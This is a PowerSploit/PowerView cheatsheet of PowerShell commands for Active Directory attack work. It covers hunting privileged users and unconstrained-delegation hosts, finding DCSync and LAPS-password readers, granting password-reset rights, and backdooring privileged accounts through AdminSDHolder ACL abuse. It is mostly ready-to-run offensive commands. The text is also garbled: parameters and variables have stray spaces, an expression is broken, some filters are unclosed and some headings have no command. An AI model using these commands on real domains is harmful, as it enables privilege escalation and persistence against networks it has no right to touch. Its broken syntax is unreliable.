Powersploit cheatsheet
Get all the groups a user is effectively a member of, ‘recursing up’:
Get-NetGroup - UserName < USER>
Get all the effective members of a group, ‘recursing down’:
Get-NetGroupMember - GoupName < GROUP> - Recurse
Get the effective set of users who can administer a server:
Get-NetLocalGroup - Recurse SERVER.domain.local
Retrieve all the computers a GPP password applies to:
Get-NetOU - GUID < GPP_GUID> | % { Get-NetComputer - ADSPath $ _} Get all users with passwords changed > 1 year ago:
$ Date= ( Get-Date ) ( -1 ) ( ) Get-NetUser - Filter " (pwdlastset<=$ Date" All enabled users:
Get-NetUser - Filter " (!userAccountControl:1.2.840.113556.1.4.803:=2)" All disabled users:
Get-NetUser - Filter " (userAccountControl:1.2.840.113556.1.4.803:=2)" All users that require smart card authentication:
Get-NetUser - Filter " (useraccountcontrol:1.2.840.113556.1.4.803:=262144)" All users that don’t require smart card authentication:
Get-NetUser - Filter " (!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" Enumerate all servers that allow unconstrained delegation, and all users that aren’t marked as sensitive/not for delegation:
$ Computers= Get-NetComputer - Unconstrained
$ Users= Get-NetUser - AllowDelegation - AdminCount
Enumerate servers that allow unconstrained kerberos delegation and show all users logged in:
Invoke-UserHunter - Unconstrained - ShowAll
Hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation:
Invoke-UserHunter - Unconstrained - AdminCount - AllowDelegation
Get the logged on users for all machines in any server OU in a particular domain:
Get-NetOU * server* - Domain < domain> | % { Get-NetComputer - ADSPath $ _| % { Get-NetLoggedOn - ComputerName $ _} } Find all users with an SPN set (likely service accounts):
Find all service accounts in “Domain Admins”:
Get-NetUser - SPN | ? { $ _.memberof -match ' Domain Admins' } Hunt for all privileged users (adminCount=1):
Invoke-UserHunter - AdminCount
Find users with sidHistory set:
Get-NetUser - Filter ' (sidHistory=*)' Enumerate all global catalogs in the forest:
Turn a list of computer short names to FQDNs:
gc computers.txt | % { Get-NetComputer - ADSpath " GC://GLOBAL.CATALOG" - Filter " (name=$ _" } Find interesting .vbs/.bat/.ps1 scripts on domain controllers:
Invoke-FileFinder - SearchSYSVol
Enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through:
$ DomainPolicy= Get-DomainPolicy [ - Domain < DOMAIN > ] [ - DomainController < DC > ]
$ DomainPolicy.KerberosPolicy $ DomainPolicy.SystemAccess Enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default:
$ DcPolicy= Get-DomainPolicy - Source DC - ResolveSids
$ DcPolicy.PrivilegeRights Enumerate what machines that a particular group has local admin rights to:
Find-GPOLocation - GroupName < GROUP>
Enumerate what machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DC:
Find-GPOLocation - UserName < USER> - Domain < DOMAIN> - DomainController < DC> - LocalGroup RDP
Export a csv of all GPO mappings:
Find-GPOLocation | % { $ _.computers = $ _.computers -join " , " ; $ _} | Export-CSV - NoTypeInformation gpo_map.csv
Use alternate credentials for searching for files on the domain:
$ Password= " PASSWORD" | ConvertTo-SecureString - AsPlainText - Force
$ Credential= New-Object System.Management.Automation.PSCredential( " DOMAIN\user" , $ Password) Invoke-FileFinder - Domain DOMAIN - Credential $ CredentialEnumerate who has rights to the ‘matt’ user in ‘testlab.local’, resolving rights GUIDs to names:
Get-ObjectAcl - SamAccountName matt - Domain testlab.local - ResolveGUIDs
Grant user ‘will’ the rights to change ‘matt’s password:
Add-ObjectAcl - TargetSamAccountName matt - PrincipalSamAccountName will - Rights ResetPassword
Audit the permissions of AdminSDHolder, resolving GUIDs:
Get-ObjectACL - ADSPrefix ' CN=AdminSDHolder,CN=System' - ResolveGUIDs
Backdoor the ACLs of all privileged accounts with the ‘matt’ account through AdminSDHolder abuse:
Add-ObjectAcl - TargetADSprefix ' CN=AdminSDHolder,CN=System' - PrincipalSamAccountName matt - Rights All
Retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCsync):
Get-ObjectACL - DistinguishedName " dc=dev,dc=testlab,dc=local" - ResolveGUIDs | ? {
( $ _.ObjectType -match ' replication-get' ) -or ( $ _.ActiveDirectoryRights -match ' GenericAll' ) } Find linked DA accounts using name correlation:
Get-NetGroupMember - GroupName " Domain Admins" | % { Get-NetUser $ _.membername } | % { $ a= $ _.displayname.split ( " " ) [ 0 .. 1 ] -join " " ; Get-NetUser - Filter " (displayname=*$ a" } | Select-Object - Property displayname, samaccountname
Save a PowerView object to disk for later usage:
Get-NetUser | Export-Clixml user.out
$ Users= Import-Clixml user.out
Find any machine accounts in privileged groups:
Get-NetGroup - AdminCount | Get-NetGroupMember - Recurse | ? { $ _.MemberName -like ' *$' } Enumerate permissions for GPOs where users have some kind of modify rights:
Get-NetGPO | Get-ObjectAcl - ResolveGUIDs | Where-Object { ( $ _.ObjectType -eq ' All' ) -and ( $ _.ActiveDirectoryRights -match " GenericAll|GenericWrite|WriteProperty|CreateChild" ) } Find all policies applied to a current machine:
Get-NetGPO - ComputerName WINDOWS1.testlab.local
Find the user/groups that have read access to the LAPS password property for a specified computer:
Get-NetComputer - ComputerName ' LAPSCLIENT.test.local' - FullData |
Select-Object - ExpandProperty distinguishedname |
ForEach-Object { $ _.substring ( $ _.indexof ( ' OU' ) ) } | ForEach-Object {
Get-ObjectAcl - ResolveGUIDs - DistinguishedName $ _} | Where-Object {
( $ _.ObjectType -like ' ms-Mcs-AdmPwd' ) -and
( $ _.ActiveDirectoryRights -match ' ReadProperty' ) } | ForEach-Object {
Convert-NameToSid $ _.IdentityReference } | Select-Object - ExpandProperty SID | Get-ADObject
Get the ACLs for all OUs where someone is allowed to read the LAPS password attribute:
Get-NetOU - FullData |
Get-ObjectAcl - ResolveGUIDs |
Where-Object {
( $ _.ObjectType -like ' ms-Mcs-AdmPwd' ) -and
( $ _.ActiveDirectoryRights -match ' ReadProperty' ) } | ForEach-Object {
$ _| Add-Member NoteProperty ' IdentitySID' $ ( Convert-NameToSid $ _.IdentityReference ) ;
$ _} Perform a user ‘zone transfer’ by exporting all AD DNS records from all zones, exporting to a .csv:
Get-DNSZone | Get-DNSRecord | Export-CSV - NoTypeInformation dns.csv
Return all universal security groups in a forest with foreign members:
Get-NetGroup - Filter ' (member=*)(groupType=2147483656)' - ADSPath ' GC://testlab.local' - FullData | Select-Object samaccountname, distinguishedname, member | ForEach-Object {
$ GroupDomain= $ _.distinguishedname.subString ( $ _.distinguishedname.IndexOf ( " DC=" ) ) $ _.Member = $ _.Member | ForEach-Object {
$ MemberDomain= $ _.subString ( $ _.IndexOf ( " DC=" ) ) if ( $ GroupDomain-ne $ MemberDomain) {
$ _} } $ _} | Where-Object { $ _.Member }